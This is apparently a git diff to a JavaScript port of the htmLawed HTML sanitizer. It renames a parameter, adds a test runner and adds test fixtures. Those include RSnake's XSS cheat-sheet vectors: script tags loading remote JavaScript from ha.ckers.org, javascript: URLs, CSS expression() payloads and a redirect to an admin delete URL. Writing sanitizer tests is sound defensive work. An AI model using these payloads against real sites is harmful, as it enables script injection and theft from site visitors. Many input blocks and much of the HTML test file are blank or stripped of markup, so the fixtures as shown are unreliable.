diff --git a/htmLawed-test.js b/htmLawed-test.js
index c89eaa7..e4b06ca 100644
--- a/htmLawed-test.js
+++ b/htmLawed-test.js
@@ -1,3 +1,24 @@
const fs = require('fs');
const htmLawed = require('./htmLawed.c.js');
-console.log(htmLawed.sanitize(fs.readFileSync(process.argv[2], { encoding: 'utf8' }), { safe: 1 }));
+
+var out1 = htmLawed.sanitize(fs.readFileSync('htmLawed_TESTCASE.txt', { encoding: 'utf8' }), { safe: 1, keep_bad: 1 });
+var check1 = fs.readFileSync('htmLawed_TESTCASE_out.htm', { encoding: 'utf8' });
+if (out1 == check1)
+ console.log("[TESTCASE.txt] OK");
+else
+{
+ console.log("[TESTCASE.txt] NOT OK, see htmLawed_TESTCASE_bad.htm");
+ fs.writeFileSync('htmLawed_TESTCASE_bad.htm', out1, { encoding: 'utf8' });
+}
+
+var tests = fs.readFileSync('rsnake_xss.txt', { encoding: 'utf8' });
+var m;
+while ((m = /^(\d+)\.\s*([^\n]+)\n\nInput code »\n([\s\S]*?)\n\nOutput code »\n([\s\S]*?)\n\n/.exec(tests)))
+{
+ var output = htmLawed.sanitize(m[3], { safe: 1, keep_bad: 1 }).trim();
+ if (output === m[4])
+ console.log("["+m[1]+"] "+m[2]+": OK");
+ else
+ console.log("["+m[1]+"] "+m[2]+": NOT OK\n"+m[4]+"\n vs \n"+output);
+ tests = tests.substr(m[0].length);
+}
diff --git a/htmLawed.js b/htmLawed.js
index d25de23..49dcc21 100644
--- a/htmLawed.js
+++ b/htmLawed.js
@@ -161,8 +161,8 @@ var htmLawed = module.exports =
t = htmLawed._strtr(t, { "\x01": '', "\x02": '', "\x03": '&', "\x04": '<', "\x05": '>' });
if (C.tidy)
t = htmLawed.hl_tidy(t, C.tidy, C.parent);
- return t;
// eof
+ return t;
},
hl_attrval: function(a, t, p)
{
@@ -208,10 +208,10 @@ var htmLawed = module.exports =
return (r.length > 0 ? r.join(s) : (p['default'] || 0));
// eof
},
- hl_bal: function(t, perf, intag)
+ hl_bal: function(t, keep_bad, intag)
{
- if (perf === undefined)
- perf = 1;
+ if (keep_bad === undefined)
+ keep_bad = 1;
// balance tags
// by content
var cont = {};
@@ -271,7 +271,7 @@ var htmLawed = module.exports =
// intag sets allowed child
intag = ((el.F[intag] && intag != '#pcdata') || el.O[intag]) ? intag : 'div';
if (cont.E[intag])
- return (!perf ? '' : htmLawed.replace(//g, '>'));
+ return (!keep_bad ? '' : htmLawed.replace(//g, '>'));
var inOk = getCont(intag);
var ok = {}, q = [], ql; // q = seq list of open non-empty ele
var _ob = '';
@@ -421,13 +421,13 @@ var htmLawed = module.exports =
delete cont.I['ins'];
}
// bad tags, & ele content
- if (e && (perf == 1 || (ok['#pcdata'] && (perf == 3 || perf == 5))))
+ if (e && (keep_bad == 1 || (ok['#pcdata'] && (keep_bad == 3 || keep_bad == 5))))
_ob += '<'+s+e+a+'>';
if (x !== '' && x !== null)
{
if (x.trim().length > 0 && ((ql && cont.B[p]) || (cont.B[intag] && !ql))) // FIXME trim
_ob += '
'+x+'
';
- else if (perf < 3 || ok['#pcdata'])
+ else if (keep_bad < 3 || ok['#pcdata'])
_ob += x;
else if (x.indexOf("\x02\x04") >= 0)
{
@@ -435,10 +435,10 @@ var htmLawed = module.exports =
for (var _i = 0; _i < x.length; _i++)
{
var v = x[_i];
- _ob += v.substr(0, 2) == "\x01\x02" ? v : (perf > 4 ? v.replace(/\S+/g, '') : '');
+ _ob += v.substr(0, 2) == "\x01\x02" ? v : (keep_bad > 4 ? v.replace(/\S+/g, '') : '');
}
}
- else if (perf > 4)
+ else if (keep_bad > 4)
_ob += x.replace(/\S+/g, '');
}
}
diff --git a/htmLawed_TESTCASE_out.htm b/htmLawed_TESTCASE_out.htm
new file mode 100644
index 0000000..906f663
--- /dev/null
+++ b/htmLawed_TESTCASE_out.htm
@@ -0,0 +1,450 @@
+/*
+htmLawed_TESTCASE.txt, 27 February 2016
+htmLawed 1.1.22, 5 March 2016
+Copyright Santosh Patnaik
+Dual licensed with LGPL 3 and GPL 2+
+A PHP Labware internal utility - http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
+*/
+
+This file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.
+
+************************************************
+when viewing this file in a web browser, set the
+character encoding to Unicode/UTF-8
+************************************************
+
+--------------------- start --------------------
+
+Try different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page
+
+Attributes
+
+Xml:lang: , ,
+Standard, predefined value, or empty attribute: , ,
+Required: ,
+Quote & space variation: a , a , a
+Invalid: a
+Duplicated: a
+Deprecated: a ,
+Casing:
+Custom:
+Data-*: a
+Admin-restricted?:
+
+Attribute values
+
+Duplicate ID value: , ,
+(try 'my_' for prefix)
+Double-quotes in value: , ,
+(try filter for CSS expression)
+CSS expression :
+Other: ,
+(try 'maxlen', 'maxval', etc., for 'input' in '$spec')
+
+Blockquotes
+
+abc
+
+abc
def
+
+abcdef
ghi
+
+x
<!-- comment -->QQQ
+
+x<!-- comment -->
QQQ
x
+
+(try with blockquote parent)
+
+CDATA sections
+
+Special characters inside: <![CDATA[ ]]> ]]>, <![CDATA[ 3 < 4 > 3.5, & 4 > 4 ]]>
+Normal: <![CDATA[ check ]]>, CDATA follows:<![CDATA[ check ]]>
+Malformed: <![cdata check ]]>, < ![CDATA check ]]>, <![CDATA check ]]>, < ![CDATA check ] ]>
+Invalid: >CDATA in tag content , <![CDATA[ check ]]>text not allowed
+
+Complex-1: deprecated elements
+
+
+The PHP software script used for this web-page webpage is htmLawedTest.php , from PHP Labware .
+
+
+Complex-2: deprecated attributes
+
+
+
+
+
+
+
+
+
+
+
+ First item
+
+
+
+
+
+Complex-3: embed, object, area
+
+<object width="425" height="350"><param name="movie" value="http://www.youtube.com/v/ls7gi1VwdIQ" /></param><embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed></object>
+
+<embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed>
+
+<object data="1.gif" type="image/gif" usemap="#map1">
+navigate the site: 1 | 3 | 4
+
+ </object>
+
+<param name="name" />value</param>
+
+<object id="obj1">
+ <param name="param1" />
+ <object id="obj2">
+ <param name="param2" />
+ </object>
+</object>
+
+Complex-4: nested and other tables
+
+
+PCDATA wrong:
+Missing tr:
+
+Complex-5: pseudo, disallowed or non-HTML tags
+
+(Try different 'keep_bad' values)
+<*> Pseudotags <*>
+<xml>Non-HTML tag xml</xml>
+
+Disallowed tag p
+
+
+
+Elements
+
+Unbalanced: check </em>
+Non-XHTML:
+Malformed: < a href=""></a>, , , , < /a>, < a href=""> , , , <imgsrc="s" alt="a" />
+Invalid: <image src="s" alt="a" />
+Empty: , </img>, text</img>
+Content invalid: 1 2 </a>
+Content invalid?: (try setting 'form' as parent)
+Casing:
+Check for tidy: </div> </div> </div>hi
+
+Entities
+
+Special: & 3 < 2 & 5>4 and j >i >a & i<j>a
+Padding: B B f f  
+Malformed: & #x27;, &x27;, ' &TILDE;, &tilde
+Invalid: , �, , �, , &bad;
+Discouraged characters: , „, ,
+Context: '>', <?
+Casing: ', ', &TILDE;, ˜
+
+(also check named-to-numeric and hexdec-to-decimal, and vice versa, conversions)
+
+Format
+
+Valid but ill-formatted: text <!-- comment -->
+text <!--
+A c o m m e n t -->
+<script>
+ <![CDATA[
+ code
+ ]]>
+</script><!-- comment --><![CDATA[ cdata ]]> text</b> text<pre id="none">p r e</pre>
+ text text <hr />
+text tex t
+text t e x t
+ text t e x t
+
+text t e x t
+<script>script</script>
+
+
p r e <!-- comment -->
+
+ pre
+
+
+
+(try to compact or beautify)
+
+Forms
+
+(note nesting of 'form', missing required attributes, etc.)
+ </form>
+
+B: C:
+(try each of these lines separately)
+what
+
what
+(try with container as div and as form)
+
c
a b <script>s</script>
+
+
HTML comments (also CDATA)
+
+
Script inside: <!--[if gte IE 4]>
+<SCRIPT>alert('XSS');</SCRIPT>
+<![endif]-->
+
Special characters inside: <!-- <![CDATA check ]]> -->, <!-- 3 < 4 > 3.5, & 4 > 4 -->, <!-- che--ck -->, <!--[if !IE]> <-->c <!--> <![endif]-->
+Normal: <!-- check -->, <!--check -->, comment:<!-- check --> <!-- check -->, <table><!-- check --><tr><td>text not allowed</td></tr></table>
+Malformed: <![cdata check ]]>, < ![CDATA check ]]>, < ![CDATA check ] ]>
+Invalid: >comment in tag content , <!--check-->
+
+
HTML5
+
+
figure and figcaption: <figure>
<figcaption>Caption for the awesome picture</figcaption></figure>
+
article: A B
<article>
C </article><article>
E F
G
</article>
+
meter :
Heat <meter min="100" max="200" value="150">150</meter>.
+
datalist :
<datalist id="b"><option value="c"><option value="d"></datalist>
+
+
Ins-Del
+
+(depending on context, these elements can be of either block or inline type)
+
<div>block
</ins></p>d
+
+Lists
+
+Invalid character data :
+
Definition list :
a badfirst one b second
+
Definition list, close-tags omitted :
a badfirst one b second
+
Definition lists, nested :
+ T1
+ D1
+ T2
+ D2t1 d1 t2 d2
+ T3
+ D3
+ T4
+ D4t1 d1
+
+
Definition lists, nested, close-tags omitted :
+ T1
+ D1
+ T2
+ D2t1 d1 t2 d2
+ T3
+ D3
+ T4
+ D4t1 d1
+
+
Nested :
+ l1
+ l2lo1 lo2
+ l3
+ l4lo3 lo4lo5
+
+
Nested, directly :
+ l1
+ <ol>l2</ol>
+ l3
+
+
Nested, close-tags omitted :
+ l1
+ l2lo1 lo2
+ l3
+ l4lo3 lo4lo5
+
+
Complex :
+
<script></script>
+
+
+
+
+
+
+ </li></ul>
+</td></tr></table></li></ol>
+Menu :
+ <button type="button">New...</button>
+ <button type="button">Cut...</button>
+
+
+Microdata
+
+
+I am
X but people call me
Y .
+Find me at
www.xy.com
+
+
+Microsoft Word
+
+Proprietary tag : <o:p> </o:p>
+XML declaration : <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />
+XML-invalid character code-point (may not replicate) : “Where is he?” asked both Mary – the one so lovely – and Jane.
+
+Nesting
+
+Block or inline a : text
<div>hi</div>
+
+Non-English text-1
+
+Inscrieţi-vă acum la a Zecea Conferinţă Internaţională
+გთხოვთ ახლავე გაიაროთ რეგისტრაცია
+večjezično računalništvo
+อ.อ่าง
+Зарегистрируйтесь сейчас
+на Десятую Международную Конференцию по
+(this file should have utf-8 encoding; some characters may not be displayed because of missing fonts, etc.)
+
+Non-English text-2: entities
+
+用统一码
+გთხოვთ
+Inscreva-se agora para a Décima Conferência Internacional Sobre O Unicode, realizada entre os dias 10 e 12 de março de 1997 em Mainz
+na Alemanha.
+
+Ruby
+
+(need compatible browser)
+
+
+ 斎
+ 藤
+ 信
+ 男
+
+
+ さい
+ とう
+ のぶ
+ お
+
+
+ W3C Associate Chairman
+
+
+
+ WWW
+ ( World Wide Web )
+
+
+ A
+ ( aaa )
+
+
+
+Tables
+
+Omitted closing tags:
+
+
+h1c1 h1c2
+
+r1c1 r1c2
+ r2c1 r2c2
+
+Nested, omitted closing tags:
+
+
+h1c1 h1c2
+
+r1c1 r1c2
+
+
+h1c1 h1c2
+
+r1c1 r1c2
+ r2c1 r2c2
+
+ r2c1 r2c2
+
+
+Tag transformation
+Font element intended as 'inline' element: hi
+Font element intended as 'block' element: <div>hi
</span></div>
+Font element intended as 'block' element: <div>hi
QQQ
</span></div>
+
+Tidy
+White-space handling: abc def ghi abc def ghi
+
+URLs
+
+Relative and absolute: , , , , , ,
+(try base URL value of 'http://a.com/b/')
+CSS URLs:
,
,
,
,
+Double URLs: b
+Anti-spam: (try regex for 'http://a.com', etc.) , , , , , , ,
+Soft-hyphen: ídisc
+
+XSS
+
+
+'';!--"<xss>=&{()}
+
+
+
+
+test
+
+<div style="javascript:alert('xss');"></div>
+<div style="background-image:url(denied:javascript:alert('xss'));"></div>
+<div style="background-image:url("denied:javascript:alert('xss')" );"></div>
+<!--[if gte IE 4]><script>alert('xss');</script><![endif]-->
+<script a=">" src="http://ha.ckers.org/xss.js"></script>
+<div style="background-image: url('denied:js:xss')"></div>
+test
+Bad IE7: x
+Opera: link
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: xxx
+Bad IE7: x
+Bad IE7: x
+Bad IE7: x
+Bad IE7: x
+Bad IE7: exp/*x
+Bad IE7: hi
+Bad IE7: hi
+Bad IE7: test
+Bad IE7: hi
+Bad IE7: hi
+
+<h6>Other</h6>
+
+3 < 4
+3 > 4
+ > 3
+<._.> hi!
+<<< ALERT >>>
+<![if !vml]> some stuff <![endif]>
+<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" />
+<uml:ns ns = "urn:www">
+<uml:ns ns = 'urn:www'>
+if(13<age AND 21>age){say 'teen'}
+age >51 and a smoking history of >51 pack-years was
+age > 51 and a smoking history of >51 pack-years was
+age <51 and a smoking history of <51 pack-years <b>was</b>
+age < 51 and a smoking history of < 51 pack-years was
+age >51 and a smoking history of >51 pack-years
+age > 51 and a smoking history of >51 pack-years
+age <51 and a smoking history of <51 pack-years</b>
+age < 51 and a smoking history of < 51 pack-years
+
\ No newline at end of file
diff --git a/rsnake_xss.txt b/rsnake_xss.txt
new file mode 100644
index 0000000..d047315
--- /dev/null
+++ b/rsnake_xss.txt
@@ -0,0 +1,642 @@
+1. XSS Locator
+
+Input code »
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>
+
+Output code »
+';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
+2. XSS Quick Test
+
+Input code »
+'';!--"=&{()}
+
+Output code »
+'';!--"<XSS>=&{()}
+
+3. SCRIPT w/Alert()
+
+Input code »
+
+
+Output code »
+<SCRIPT>alert('XSS')</SCRIPT>
+
+4. SCRIPT w/Source File
+
+Input code »
+
+
+Output code »
+<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+
+5. SCRIPT w/Char Code
+
+Input code »
+
+
+Output code »
+<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+
+6. DIV background-image 1
+
+Input code »
+
+
+Output code »
+
+
+7. DIV background-image 2
+
+Input code »
+
+
+Output code »
+
+
+8. DIV expression
+
+Input code »
+
+
+Output code »
+
+
+9. IFRAME
+
+Input code »
+
+
+Output code »
+<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
+
+10. INPUT Image
+
+Input code »
+
+
+Output code »
+
+
+11. IMG w/JavaScript Directive
+
+Input code »
+
+
+Output code »
+
+
+12. IMG No Quotes/Semicolon
+
+Input code »
+
+
+Output code »
+
+
+13. IMG Dynsrc
+
+Input code »
+
+
+Output code »
+
+
+14. IMG Lowsrc
+
+Input code »
+
+
+Output code »
+
+
+15. IMG Embedded commands 1
+
+Input code »
+
+
+Output code »
+
+
+16. IMG Embedded commands 2
+
+Input code »
+Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
+
+Output code »
+Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
+
+17. IMG STYLE w/expression
+
+Input code »
+exp/*
+
+Output code »
+exp/*<XSS STYLE='no\xss:noxss("*//*");
+xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
+
+18. IMG w/VBscript
+
+Input code »
+
+
+Output code »
+
+
+19. LAYER
+
+Input code »
+
+
+Output code »
+<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
+
+20. Livescript
+
+Input code »
+
+
+Output code »
+
+
+21. US-ASCII encoding
+
+Input code »
+%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
+
+Output code »
+%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
+
+22. Mocha
+
+Input code »
+
+
+Output code »
+
+
+23. OBJECT
+
+Input code »
+
+
+Output code »
+<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
+
+24. OBJECT w/Embedded XSS
+
+Input code »
+
+
+Output code »
+<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name="url" value="javascript:alert(" /></OBJECT>
+
+25. Embed Flash
+
+Input code »
+
+
+Output code »
+<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
+
+26. OBJECT w/Flash 2
+
+Input code »
+a="get";
b="URL("";
c="javascript:";
d="alert('XSS');")";
+eval(a+b+c+d);
+
+Output code »
+a="get";
b="URL("";
c="javascript:";
d="alert('XSS');")";
+eval(a+b+c+d);
+
+27. STYLE
+
+Input code »
+
+
+Output code »
+<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
+
+28. STYLE w/Comment
+
+Input code »
+
+
+Output code »
+
+
+29. STYLE w/Anonymous HTML
+
+Input code »
+
+
+Output code »
+<XSS STYLE="xss:expression(alert('XSS'))">
+
+30. TABLE
+
+Input code »
+
+
+Output code »
+
+
+31. TD
+
+Input code »
+
+
+Output code »
+
+
+32. XML namespace
+
+Input code »
+
+
+XSS
+
+
+Output code »
+<HTML xmlns:xss>
+<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
+<xss:xss>XSS</xss:xss>
+</HTML>
+
+33. XML data island w/CDATA
+
+Input code »
+]]>
+
+
+Output code »
+<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
+</C></X></xml>
+
+34. XML data island w/comment
+
+Input code »
+
+
+
+Output code »
+<XML ID="xss"> cript:alert('XSS')"> </XML>
+
+
+35. XML (locally hosted)
+
+Input code »
+
+
+
+Output code »
+<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
+
+
+36. XML HTML+TIME
+
+Input code »
+
+
+
+
+
+Output code »
+<HTML><BODY>
+<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
+<?import namespace="t" implementation="#default#time2">
+<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
+
+37. Commented-out Block
+
+Input code »
+
+
+Output code »
+<!--[if gte IE 4]>
+<SCRIPT>alert('XSS');</SCRIPT>
+<![endif]-->
+
+38. Rename .js to .jpg
+
+Input code »
+
+
+Output code »
+<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
+
+39. SSI
+
+Input code »
+
+
+Output code »
+<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
+
+40. PHP
+
+Input code »
+ echo('alert("XSS")'); ?>
+
+Output code »
+<? echo('<SCR)';
+echo('IPT>alert("XSS")</SCRIPT>'); ?>
+
+41. JavaScript Includes
+
+Input code »
+
+
+Output code »
+
+
+42. Case Insensitive
+
+Input code »
+
+
+Output code »
+
+
+43. HTML Entities
+
+Input code »
+
+
+Output code »
+
+
+44. Grave Accents
+
+Input code »
+
+
+Output code »
+
+
+45. Image w/CharCode
+
+Input code »
+
+
+Output code »
+
+
+46. UTF-8 Unicode Encoding
+
+Input code »
+
+
+Output code »
+
+
+47. Long UTF-8 Unicode w/out Semicolons
+
+Input code »
+
+
+Output code »
+
+
+48. DIV w/Unicode
+
+Input code »
+
+
+Output code »
+
+
+49. Hex Encoding w/out Semicolons
+
+Input code »
+
+
+Output code »
+
+
+50. Embedded Tab
+
+Input code »
+
+
+Output code »
+
+
+51. Embedded Encoded Tab
+
+Input code »
+
+
+Output code »
+
+
+52. Embedded Newline
+
+Input code »
+
+
+Output code »
+
+
+53. Embedded Carriage Return
+
+Input code »
+
+
+Output code »
+
+
+54. Multiline w/Carriage Returns
+
+Input code »
+
+
+Output code »
+
+
+55. Spaces/Meta Chars
+
+Input code »
+
+
+Output code »
+
+
+56. Non-Alpha/Non-Digit
+
+Input code »
+
+
+Output code »
+<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+57. Non-Alpha/Non-Digit Part 2
+
+Input code »
+
+
+Output code »
+<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
+
+58. No Closing Script Tag
+
+Input code »
+
+
+Output code »
+<<SCRIPT>alert("XSS");//<</SCRIPT>
+
+63. Malformed IMG Tags
+
+Input code »
+
">
+
+Output code »
+
<SCRIPT>alert("XSS")</SCRIPT>">
+
+64. No Quotes/Semicolons
+
+Input code »
+
+
+Output code »
+<SCRIPT>a=/XSS/
+alert(a.source)</SCRIPT>
+
+65. Evade Regex Filter 1
+
+Input code »
+
+
+Output code »
+<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+66. Evade Regex Filter 2
+
+Input code »
+
+
+Output code »
+<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+67. Evade Regex Filter 3
+
+Input code »
+
+
+Output code »
+<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+68. Evade Regex Filter 4
+
+Input code »
+
+
+Output code »
+<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+69. Evade Regex Filter 5
+
+Input code »
+
+
+Output code »
+<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+70. Filter Evasion 1
+
+Input code »
+PT SRC="http://ha.ckers.org/xss.js">
+
+Output code »
+<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+71. Filter Evasion 2
+
+Input code »
+
+
+Output code »
+<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+
+72. Mixed Encoding
+
+Input code »
+
XSS
+
+Output code »
+
XSS
+
+73. JavaScript Link Location
+
+Input code »
+
XSS
+
+Output code »
+
XSS
diff --git a/test-htmLawed.sh b/test-htmLawed.sh
index 8a1452e..ec549dd 100644
--- a/test-htmLawed.sh
+++ b/test-htmLawed.sh
@@ -2,4 +2,4 @@
# php -r 'require "htmLawed.php"; print htmLawed::sanitize(file_get_contents("test_xss.txt"), array("safe" => 1));' > test_php.htm
node_modules/.bin/eslint --rulesdir eslint-plugin-no-regex-dot htmLawed.js
node_modules/.bin/babel htmLawed.js > htmLawed.c.js
-nodejs htmLawed-test.js test_xss.txt
+nodejs htmLawed-test.js
diff --git a/test_php.htm b/test_php.htm
deleted file mode 100644
index 22e8411..0000000
--- a/test_php.htm
+++ /dev/null
@@ -1,42 +0,0 @@
-
-'';!--"=&{()}
-
-
-
-
-
test
-
-
-
-
-<!--[if gte IE 4]>alert('xss');<![endif]-->
-" src="http://ha.ckers.org/xss.js">
-Bad in PHP version without safe: " ";alert(window.location.href);//>
-
-test
-Bad IE7: x
-Opera: link
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: x
-Bad IE7: x
-Bad IE7: x
-Bad IE7: x
-Bad IE7: exp/*x
-Bad IE7: hi
-Bad IE7: hi
-Bad IE7: test
-Bad IE7: hi
-Bad IE7: hi
-
\ No newline at end of file
diff --git a/test_xss.txt b/test_xss.txt
deleted file mode 100644
index 0f13cbb..0000000
--- a/test_xss.txt
+++ /dev/null
@@ -1,44 +0,0 @@
-
-'';!--"
=&{()}
-
-
-
-
-test
-
-
-
-
-
-
-Bad in PHP version without safe:
-
-test
-Bad IE7: x
-Opera: link
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: xxx
-Bad IE7: x
-Bad IE7: x
-Bad IE7: x
-Bad IE7: x
-Bad IE7: exp/*x
-Bad IE7: hi
-Bad IE7: hi
-Bad IE7: test
-Bad IE7: hi
-Bad IE7: hi